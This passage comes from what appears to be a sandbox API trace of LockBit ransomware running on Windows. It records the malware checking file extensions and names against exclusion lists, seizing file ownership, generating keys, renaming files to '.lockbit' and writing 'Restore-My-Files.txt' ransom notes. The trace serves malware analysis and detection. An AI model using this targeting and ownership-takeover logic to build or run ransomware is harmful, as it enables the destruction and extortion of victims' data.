[0079.348] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.348] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.348] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.348] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.348] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.348] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.348] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.348] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.348] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.348] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.348] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.348] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.348] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.348] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.348] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="nav_leftarrow.png") returned 1 [0079.348] lstrcmpiW (lpString1="ntldr", lpString2="nav_leftarrow.png") returned 1 [0079.348] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="nav_leftarrow.png") returned 1 [0079.348] lstrcmpiW (lpString1="bootsect.bak", lpString2="nav_leftarrow.png") returned -1 [0079.348] lstrcmpiW (lpString1="autorun.inf", lpString2="nav_leftarrow.png") returned -1 [0079.348] lstrcmpiW (lpString1="thumbs.db", lpString2="nav_leftarrow.png") returned 1 [0079.349] lstrcmpiW (lpString1="iconcache.db", lpString2="nav_leftarrow.png") returned -1 [0079.349] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\") returned="" [0079.349] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png") returned=".png" [0079.349] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.349] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.349] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.349] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.349] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.349] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.349] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.349] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.349] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.349] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.349] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.349] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.349] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.349] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.349] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.349] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.349] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.349] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.349] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.349] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.349] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.349] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.349] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.349] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.349] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.349] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.349] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.349] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.349] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png.lockbit") returned 78 [0079.350] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_leftarrow.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.350] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.350] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.350] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.350] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.351] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.351] RtlFreeAnsiString (AnsiString="\\") [0079.351] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.351] malloc (_Size=0x200) returned 0x77d800 [0079.351] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.351] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.351] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.351] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.351] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.351] CloseHandle (hObject=0x3c4) returned 1 [0079.351] free (_Block=0x77d800) [0079.352] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_leftarrow.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.352] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.352] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.352] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=4503) returned 1 [0079.352] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.352] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.352] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.353] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.353] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0079.365] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.365] malloc (_Size=0xb2) returned 0x1ff1e60 [0079.365] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0079.365] free (_Block=0x1ff1e60) [0079.365] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 1 [0079.365] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt") returned 73 [0079.365] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.365] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ff2c81, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70ff2c81, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f27579, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="nav_rightarrow.png", cAlternateFileName="")) returned 1 [0079.365] lstrcmpiW (lpString1=".", lpString2="nav_rightarrow.png") returned -1 [0079.365] lstrcmpiW (lpString1="..", lpString2="nav_rightarrow.png") returned -1 [0079.365] PathFindExtensionW (pszPath="nav_rightarrow.png") returned=".png" [0079.366] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.366] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.366] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.366] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.366] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.366] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.366] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.366] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.366] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.366] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.367] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.367] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.367] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="nav_rightarrow.png") returned 1 [0079.367] lstrcmpiW (lpString1="ntldr", lpString2="nav_rightarrow.png") returned 1 [0079.367] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="nav_rightarrow.png") returned 1 [0079.367] lstrcmpiW (lpString1="bootsect.bak", lpString2="nav_rightarrow.png") returned -1 [0079.367] lstrcmpiW (lpString1="autorun.inf", lpString2="nav_rightarrow.png") returned -1 [0079.367] lstrcmpiW (lpString1="thumbs.db", lpString2="nav_rightarrow.png") returned 1 [0079.367] lstrcmpiW (lpString1="iconcache.db", lpString2="nav_rightarrow.png") returned -1 [0079.367] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\") returned="" [0079.367] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png") returned=".png" [0079.367] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.367] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.367] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.367] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.368] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.368] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.368] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.368] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.368] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.368] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.368] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.368] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.368] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.368] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.368] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.368] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.368] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.368] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.368] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.368] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.368] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png.lockbit") returned 79 [0079.368] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_rightarrow.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.369] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.369] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.369] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.369] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.369] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.369] RtlFreeAnsiString (AnsiString="\\") [0079.369] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.369] malloc (_Size=0x200) returned 0x77d800 [0079.369] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.369] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.369] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.369] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.370] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.370] CloseHandle (hObject=0x3c4) returned 1 [0079.370] free (_Block=0x77d800) [0079.370] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_rightarrow.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.370] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.370] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.370] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=4515) returned 1 [0079.370] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.371] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.371] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.371] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.371] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0079.378] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.378] malloc (_Size=0xb4) returned 0x1ff1e60 [0079.378] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0079.378] free (_Block=0x1ff1e60) [0079.378] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 1 [0079.378] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt") returned 73 [0079.378] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.379] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71018dde, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71018dde, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f4d6d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1068, dwReserved0=0x0, dwReserved1=0x0, cFileName="nav_uparrow.png", cAlternateFileName="")) returned 1 [0079.379] lstrcmpiW (lpString1=".", lpString2="nav_uparrow.png") returned -1 [0079.379] lstrcmpiW (lpString1="..", lpString2="nav_uparrow.png") returned -1 [0079.379] PathFindExtensionW (pszPath="nav_uparrow.png") returned=".png" [0079.379] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.379] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.379] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.379] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.379] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.379] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.379] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.379] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.379] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.379] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.379] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.379] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.379] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.379] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.379] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.379] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.379] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.379] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.379] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.379] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.379] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.380] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.380] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.380] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.380] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.380] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.380] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.380] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.380] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.380] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.380] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.380] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.380] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.380] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.380] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.380] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.380] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.380] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.380] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.380] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.380] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.380] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.380] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.380] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.380] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.380] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.380] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.380] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="nav_uparrow.png") returned 1 [0079.380] lstrcmpiW (lpString1="ntldr", lpString2="nav_uparrow.png") returned 1 [0079.380] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="nav_uparrow.png") returned 1 [0079.380] lstrcmpiW (lpString1="bootsect.bak", lpString2="nav_uparrow.png") returned -1 [0079.380] lstrcmpiW (lpString1="autorun.inf", lpString2="nav_uparrow.png") returned -1 [0079.380] lstrcmpiW (lpString1="thumbs.db", lpString2="nav_uparrow.png") returned 1 [0079.380] lstrcmpiW (lpString1="iconcache.db", lpString2="nav_uparrow.png") returned -1 [0079.381] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\") returned="" [0079.381] PathFindExtensionW 